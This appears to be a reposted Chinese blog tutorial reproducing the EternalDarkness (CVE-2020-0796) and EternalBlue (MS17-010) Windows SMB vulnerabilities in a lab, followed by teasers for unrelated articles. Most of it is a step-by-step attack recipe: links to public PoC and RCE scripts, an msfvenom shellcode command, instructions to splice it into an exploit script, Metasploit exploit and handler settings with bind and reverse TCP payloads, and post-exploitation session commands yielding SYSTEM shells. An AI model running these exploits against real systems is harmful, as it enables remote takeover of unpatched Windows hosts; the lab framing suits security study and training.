永恒之黑和永恒之蓝 漏洞解析及复现

2024-02-21 19:04
文章标签 漏洞 解析 复现 永恒

本文主要是介绍永恒之黑和永恒之蓝 漏洞解析及复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

充当攻击机的机器是kali,另外需要关闭防火墙策略。

永恒之黑(CVE-2020-0796

靶机:windows 10的IP地址:192.168.200.30

原理:实现远程代码执行

注意:

这个脚本运行有时候会导致靶机蓝屏,需重启靶机,几次执行脚本知道得到shell。

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
攻击poc:https://github.com/eerykitty/CVE-2020-0796-PoC
shell脚本:https://github.com/chompie1337/SMBGhost_RCE_PoC

检验

1.WIN10的防火墙和自动更新功能关闭。

2.在攻击机上对目标机进行检测,看其是否存在漏洞,检测目标存在漏洞。

1702443745_65793ae1877ec25dd533a.png!small?1702443746651

3.利用poc脚本对靶机发起攻击(kali中执行)。

python3 CVE-2020-0796.py 192.168.200.30

win10 就会出现蓝屏,攻击成功。

1702443754_65793aeaccca60edb33fa.png!small?1702443755852

反弹shell

1.生成反向连接木马。

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1234 -b '\x00' -i 1 -f python# 对端口号是1234进行监听

2.用生成的shellcode将shell脚本工具里面的exploit.py中的buf替换为USER_POYLOAD。保留名字,只替换内容。1702443763_65793af3a93c1345d3ea1.png!small?1702443765780

在真机中进行修改较方便,然后在将文件传入到KALI中去(按下CTRL+F将buf 替换为 user_payload)。

1702443772_65793afca0629b8f381bb.png!small?1702443774587

3.开启msf模块。

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 1234
set rhost 192.168.200.30
run

1702443782_65793b06018ec89ba5ebb.png!small?1702443783264

注意:1.监听模块的端口设置,和生成的木马设置的端口要相同,用于反弹shell的入口的。

2.倘若出现问题,可以使用show options进行查看自己设置的信息。

4.运行exploit.py脚本,发起攻击,并且反弹shell。

(如果此处失败,请多次尝试 回车 即可)

1702443789_65793b0d4bc1e8492ce4d.png!small?1702443790497

5.执行成功后,查看监听的的串口,成功得到shell(这里需要输入shell获取靶机权限,以此更方便的查看)。

1702443795_65793b13bb1e94968bb9e.png!small?1702443797174

输入ipconfig之后可以看到靶机的IP地址,实现了远程代码执行,这时就可以在此最高权限下进行玩耍!

1702443802_65793b1a6be46bb745674.png!small?1702443803923

永恒之蓝漏洞复现(ms17-010)

IP地址可能会有变化,如本文思路有能帮助到您的地方,不胜荣幸!

基础命令

#进入msf:msfconsole
#使用search查找相关漏洞: search  ms17-010
#使用use进入模块: use 数字  
#使用info查看模块信息:info 
#设置poc的连接方式:set payload windows/x64/meterpreter /reverse_tcp  
#查看模块需要配置的参数:show options
#设置参数:set RHOST 192.168.200.4
#攻击:exploit / run 
#回退:back

后渗透命令

#查看当前用户:getuid
#进入shell:shell
#解决shell乱码:chcp 65001
#退出shell:exit
#把会话放到后台:background
#查看所有会话:sessions
#进入某个会话: sessions -i id号
#删除会话:sessions -k id号

环境准备

攻击机:kali:192.168.200.1

被攻击机:win7 x64 192.168.200.4 关闭防火墙

1 主机发现

在kali中使用nmap扫描win7

Nmap -sS 192.168.200.4

如下发现主机开启了445端口,操作系统类型可能为win7。

1702443820_65793b2ce8733e3c7d265.png!small?1702443822318

WIN7IP地址。

1702443829_65793b356f6f57434f2c7.png!small?1702443830568

WIN7MAC地址。

1702443837_65793b3d1bfc1352008ba.png!small?1702443838143

2 漏洞探测

先进入msf,然后搜寻ms17-010的漏洞模块。

Msfconsole   
#搜寻模块:search ms17-010 
#使用模块:use 3 

我们先使用scanner模块对主机进行扫描,检测是否存在漏洞,使用use 3。

1702443849_65793b49001be551f18f6.png!small?1702443850255

1702443855_65793b4f10df609a16fb4.png!small

1702443864_65793b58be5c1e2b7d6ce.png!small?1702443865791

进入到该模块之后,可以使用info查看该漏洞模块的具体介绍信。

info

那怎么利用这个模块来对主机进行扫描了?使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。RHOSTS选项为空,所以我们需要填写,RHOSTS代表要攻击的目标。输入r然后按tab键可以自动补全该参数。

show options
set rhosts 192.168.200.4

1702443893_65793b7530d255a83bc14.png!small?1702443894495

1702443899_65793b7b6ce78cd7e06eb.png!small?1702443900719

下面就可以执行扫描攻击。

run

显示主机很可能能够会受到永恒之蓝漏洞的攻击。

1702443906_65793b821b4a98b1c047c.png!small?1702443907235

3 漏洞攻击

检测存在漏洞后,就可以尝试对漏洞进行攻击,我们选择漏洞利用模块,然后和上面的操作一样,填写必须的参数。

search 17-010
use 0
#设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhosts 192.168.200.4

1702443921_65793b913ea9b5d2b8f25.png!small?1702443922713

1702443925_65793b95c533251a0c646.png!small?1702443927274

执行攻击,返回一个meterpreter 会话,通过该会话可以控制目标主机,成功拿下主机system权限。

1702443933_65793b9d6cae08b5669fb.png!small?1702443934676

拿到主机权限后,可以进入该主机的shell(cmd),执行cmd命令。

#进入dos命令行:shell
#切换编码,解决乱码问题:chcp 65001
#cmd命令的执行:ipconfig

1702443942_65793ba65af812ca150e4.png!small?1702443943518

1702443948_65793bac64eb7c2f7faf5.png!small?1702443949605

至此,整个攻击过程结束。暂时不用这个会话了,可以退出当前shell,然后把该会话放到msf后台。

exit
background

1702443956_65793bb41c77c0dc5f91f.png!small?1702443957248

查看所有连接的会话,随时可以进入某个会话。

sessions
sessions -i id号

1702443963_65793bbb4d78003e62a9e.png!small?1702443964562

完结!

这篇关于永恒之黑和永恒之蓝 漏洞解析及复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/732756

相关文章

网页解析 lxml 库--实战

lxml库使用流程 lxml 是 Python 的第三方解析库,完全使用 Python 语言编写,它对 XPath表达式提供了良好的支 持,因此能够了高效地解析 HTML/XML 文档。本节讲解如何通过 lxml 库解析 HTML 文档。 pip install lxml lxm| 库提供了一个 etree 模块,该模块专门用来解析 HTML/XML 文档,下面来介绍一下 lxml 库

【C++】_list常用方法解析及模拟实现

相信自己的力量,只要对自己始终保持信心,尽自己最大努力去完成任何事,就算事情最终结果是失败了,努力了也不留遗憾。💓💓💓 目录   ✨说在前面 🍋知识点一:什么是list? •🌰1.list的定义 •🌰2.list的基本特性 •🌰3.常用接口介绍 🍋知识点二:list常用接口 •🌰1.默认成员函数 🔥构造函数(⭐) 🔥析构函数 •🌰2.list对象

OWASP十大安全漏洞解析

OWASP(开放式Web应用程序安全项目)发布的“十大安全漏洞”列表是Web应用程序安全领域的权威指南,它总结了Web应用程序中最常见、最危险的安全隐患。以下是对OWASP十大安全漏洞的详细解析: 1. 注入漏洞(Injection) 描述:攻击者通过在应用程序的输入数据中插入恶意代码,从而控制应用程序的行为。常见的注入类型包括SQL注入、OS命令注入、LDAP注入等。 影响:可能导致数据泄

从状态管理到性能优化:全面解析 Android Compose

文章目录 引言一、Android Compose基本概念1.1 什么是Android Compose?1.2 Compose的优势1.3 如何在项目中使用Compose 二、Compose中的状态管理2.1 状态管理的重要性2.2 Compose中的状态和数据流2.3 使用State和MutableState处理状态2.4 通过ViewModel进行状态管理 三、Compose中的列表和滚动

Spring 源码解读:自定义实现Bean定义的注册与解析

引言 在Spring框架中,Bean的注册与解析是整个依赖注入流程的核心步骤。通过Bean定义,Spring容器知道如何创建、配置和管理每个Bean实例。本篇文章将通过实现一个简化版的Bean定义注册与解析机制,帮助你理解Spring框架背后的设计逻辑。我们还将对比Spring中的BeanDefinition和BeanDefinitionRegistry,以全面掌握Bean注册和解析的核心原理。

CSP 2023 提高级第一轮 CSP-S 2023初试题 完善程序第二题解析 未完

一、题目阅读 (最大值之和)给定整数序列 a0,⋯,an−1,求该序列所有非空连续子序列的最大值之和。上述参数满足 1≤n≤105 和 1≤ai≤108。 一个序列的非空连续子序列可以用两个下标 ll 和 rr(其中0≤l≤r<n0≤l≤r<n)表示,对应的序列为 al,al+1,⋯,ar​。两个非空连续子序列不同,当且仅当下标不同。 例如,当原序列为 [1,2,1,2] 时,要计算子序列 [

多线程解析报表

假如有这样一个需求,当我们需要解析一个Excel里多个sheet的数据时,可以考虑使用多线程,每个线程解析一个sheet里的数据,等到所有的sheet都解析完之后,程序需要提示解析完成。 Way1 join import java.time.LocalTime;public class Main {public static void main(String[] args) thro

ZooKeeper 中的 Curator 框架解析

Apache ZooKeeper 是一个为分布式应用提供一致性服务的软件。它提供了诸如配置管理、分布式同步、组服务等功能。在使用 ZooKeeper 时,Curator 是一个非常流行的客户端库,它简化了 ZooKeeper 的使用,提供了高级的抽象和丰富的工具。本文将详细介绍 Curator 框架,包括它的设计哲学、核心组件以及如何使用 Curator 来简化 ZooKeeper 的操作。 1

Unity3D自带Mouse Look鼠标视角代码解析。

Unity3D自带Mouse Look鼠标视角代码解析。 代码块 代码块语法遵循标准markdown代码,例如: using UnityEngine;using System.Collections;/// MouseLook rotates the transform based on the mouse delta./// Minimum and Maximum values can

图解TCP三次握手|深度解析|为什么是三次

写在前面 这篇文章我们来讲解析 TCP三次握手。 TCP 报文段 传输控制块TCB:存储了每一个连接中的一些重要信息。比如TCP连接表,指向发送和接收缓冲的指针,指向重传队列的指针,当前的发送和接收序列等等。 我们再来看一下TCP报文段的组成结构 TCP 三次握手 过程 假设有一台客户端,B有一台服务器。最初两端的TCP进程都是处于CLOSED关闭状态,客户端A打开链接,服务器端